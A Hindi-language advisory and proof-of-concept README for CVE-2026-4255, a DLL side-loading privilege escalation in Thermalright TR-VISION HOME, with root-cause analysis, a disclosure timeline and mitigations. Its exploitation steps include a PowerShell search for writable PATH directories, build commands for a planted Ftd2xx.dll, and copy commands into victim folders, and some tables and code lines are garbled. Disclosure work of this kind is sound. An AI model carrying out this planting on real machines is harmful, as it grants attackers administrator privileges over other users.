
CVE-2026-4255 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: Thermalright TR-VISION HOME में DLL side-loading विशेषाधिकार वृद्धि PATH directory planting के माध्यम से, पूर्ण मूल कारण विश्लेषण और शमन मार्गदर्शन के साथ।
गंभीरता: उच्च (CVSS 8.4)
CWE: CWE-829 अविश्वसनीय नियंत्रण क्षेत्र से कार्यक्षमता का समावेश
प्रकाशित: 16/03/2026
CNA: Toreon
प्रभावित संस्करण: Thermalright TR-VISION HOME ≤ 2.0.5 (Windows 64-बिट)
द्वारा खोजा गया: Ard33
Thermalright TR-VISION HOME डिफ़ॉल्ट Windows DLL खोज क्रम का उपयोग करके Ftd2xx.dll (FTDI USB-से-सीरियल लाइब्रेरी) लोड करता है। इस क्रम में संरक्षित सिस्टम स्थानों से पहले उपयोगकर्ता-लेखनीय निर्देशिकाएँ शामिल हैं। चूंकि TR-VISION HOME हमेशा प्रशासनिक विशेषाधिकारों के साथ निष्पादित होता है और लोड की गई लाइब्रेरीज़ पर कोई अखंडता या हस्ताक्षर सत्यापन नहीं करता, एक हमलावर जो PATH पर किसी भी निर्देशिका में लिख सकता है, एक निर्मित Ftd2xx.dll लगा सकता है और इसे एप्लिकेशन के अगली बार लॉन्च होने पर उन्नत विशेषाधिकारों के साथ लोड करवा सकता है।
DLL लगाने के लिए किसी प्रशासनिक अधिकार की आवश्यकता नहीं है। एक निम्न-विशेषाधिकार वाला उपयोगकर्ता इसका शोषण किसी भी उपयोगकर्ता के विरुद्ध कर सकता है जो बाद में उन्नयन के साथ TR-VISION HOME लॉन्च करता है।
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
| मीट्रिक | मान |
|---|---|
| हमला वेक्टर | स्थानीय |
| हमला जटिलता | निम्न |
| हमला आवश्यकताएँ | कोई नहीं |
| आवश्यक विशेषाधिकार |
एप्लिकेशन पूर्ण रूप से योग्य पथ निर्दिष्ट किए बिना LoadLibrary("Ftd2xx.dll") कॉल करता है (या लोड समय पर इसे अंतर्निहित रूप से आयात करता है)। Windows MSDN डायनामिक-लिंक लाइब्रेरी खोज क्रम में परिभाषित खोज क्रम पर चलकर लाइब्रेरी को हल करता है:
C:\Windows\System32)PATH पर्यावरण चर में सूचीबद्ध निर्देशिकाएँ ← शोषण योग्यएक हमलावर Ftd2xx.dll को उपयोगकर्ता-लेखनीय निर्देशिका में रखता है जो PATH पर System32 से पहले आती है। C:\Users\<User>\.local\bin) ऐसी ही एक निर्देशिका है और डिफ़ॉल्ट रूप से PATH पर मौजूद है, जो इसे एक विश्वसनीय ड्रॉप स्थान बनाती है।
| सॉफ्टवेयर | संस्करण | प्लेटफॉर्म |
|---|---|---|
| Thermalright TR-VISION HOME | ≤ 2.0.5 | Windows x64 |
Windows 11 पर TR-VISION HOME 2.0.5 पर परीक्षण किया गया।
%PATH% पर उपस्थित एक उपयोगकर्ता-लेखनीय निर्देशिका1. एक लेखनीय PATH निर्देशिका पहचानें
$env:PATH -split ';' | Where-Object {
if (-not $_ -or -not (Test-Path $_)) { return $false }
try {
$t = Join-Path $_ '.wrtest'
[System.IO.File]:https://raw.githubusercontent.com/ard33/cve-2026-4255/HEAD/:Create($t).Close()
Remove-Item $t -Force
$true
} catch { $false }
}
एक विश्वसनीय डिफ़ॉल्ट: C:\Users\<User>\.local\bin
2. PoC DLL संकलित करें
MinGW (क्रॉस या नेटिव):
gcc -shared -o Ftd2xx.dll poc/Ftd2xx.c -Wl,--out-implib,Ftd2xx.lib
MSVC:
cl /LD poc\Ftd2xx.c /Fe:Ftd2xx.dll
3. DLL लगाएँ
चरण 1 से कोई भी लेखनीय निर्देशिका चुनें। दो सामान्य डिफ़ॉल्ट:
:: uv / pipx डिफ़ॉल्ट स्क्रिप्ट निर्देशिका
copy Ftd2xx.dll "C:\Users\<पीड़ित>\.local\bin\Ftd2xx.dll"
:: Python लॉन्चर (मानक Python स्थापना)
copy Ftd2xx.dll "C:\Users\<पीड़ित>\AppData\Local\Programs\Python\Launcher\Ftd2xx.dll"
इस चरण के लिए किसी उन्नयन की आवश्यकता नहीं है।
4. ट्रिगर करें
पीड़ित TR-VISION HOME लॉन्च करता है (जैसे स्टार्ट मेन्यू या सिस्टम ट्रे से)। UAC प्रॉम्प्ट एप्लिकेशन को प्रशासनिक विशेषाधिकारों के साथ चलाता है। आरंभीकरण के दौरान, Ftd2xx.dll खोज क्रम के माध्यम से हल किया जाता है, लगाया गया कॉपी System32 से पहले मिल जाता है, और हमलावर का DllMain उन्नत प्रक्रिया के अंदर निष्पादित होता है।
5. अपेक्षित परिणाम
C:\Users\Public\CVE-2026-4255_pwned.txt बनाया जाता है, जिसमें शामिल है:
TokenIsElevated = YESProcmon TR-VISION HOME (PID 78940) को PATH निर्देशिकाओं में Ftd2xx.dll खोजते हुए दिखा रहा है — सभी NAME NOT FOUND लौटा रहे हैं जब तक लगाया गया कॉपी हल नहीं होता:

Ftd2xx.dll AppData\Local\Programs\Python\Launcher\ में लगाया गया (दिनांक 26/12/2025 — खोज का दिन):

लोड किए गए DLL द्वारा उत्पन्न उन्नत cmd शेल — शीर्षक पट्टी प्रशासक संदर्भ की पुष्टि करती है:

TR-VISION HOME संस्करण 2.0.5:

Thermalright के लिए:
Ftd2xx.dll लोड करें:
LoadLibraryExA("C:\\Windows\\System32\\Ftd2xx.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
LoadLibraryEx के साथ LOAD_LIBRARY_SEARCH_SYSTEM32 या LOAD_LIBRARY_SEARCH_APPLICATION_DIR फ्लैग का उपयोग करें।WinVerifyTrust के माध्यम से लोड की गई लाइब्रेरीज़ के डिजिटल हस्ताक्षर सत्यापित करें।HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode = 1), हालांकि यह PATH-आधारित लगाने को पूरी तरह से कम नहीं करता है।उपयोगकर्ताओं के लिए (अस्थायी):
Ftd2xx.dll (FTDI D2XX ड्राइवर पैकेज से) सीधे TR-VISION HOME स्थापना निर्देशिका में रखें (जैसे C:\Program Files\TR-VISION HOME\)। एप्लिकेशन निर्देशिका पहला स्थान है जहाँ खोजा जाता है, इसलिए वहाँ एक वैध कॉपी किसी भी PATH-आधारित लगाने पर प्राथमिकता लेती है।| तारीख | घटना |
|---|---|
| 26/12/2025 | भेद्यता की खोज |
| 27/12/2025 | विक्रेता (Thermalright) से सहायता चैनलों के माध्यम से संपर्क किया गया |
| 16/03/2026 | सार्वजनिक प्रकटीकरण CVE-2026-4255 Toreon CNA द्वारा आवंटित |
यह प्रूफ-ऑफ-कॉन्सेप्ट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। PoC पेलोड जानबूझकर हानिरहित है — यह एक टेक्स्ट फ़ाइल लिखता है और एक संदेश बॉक्स दिखाता है। केवल उन सिस्टमों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।
| कोई नहीं |
| उपयोगकर्ता सहभागिता | सक्रिय (पीड़ित ऐप लॉन्च करता है) |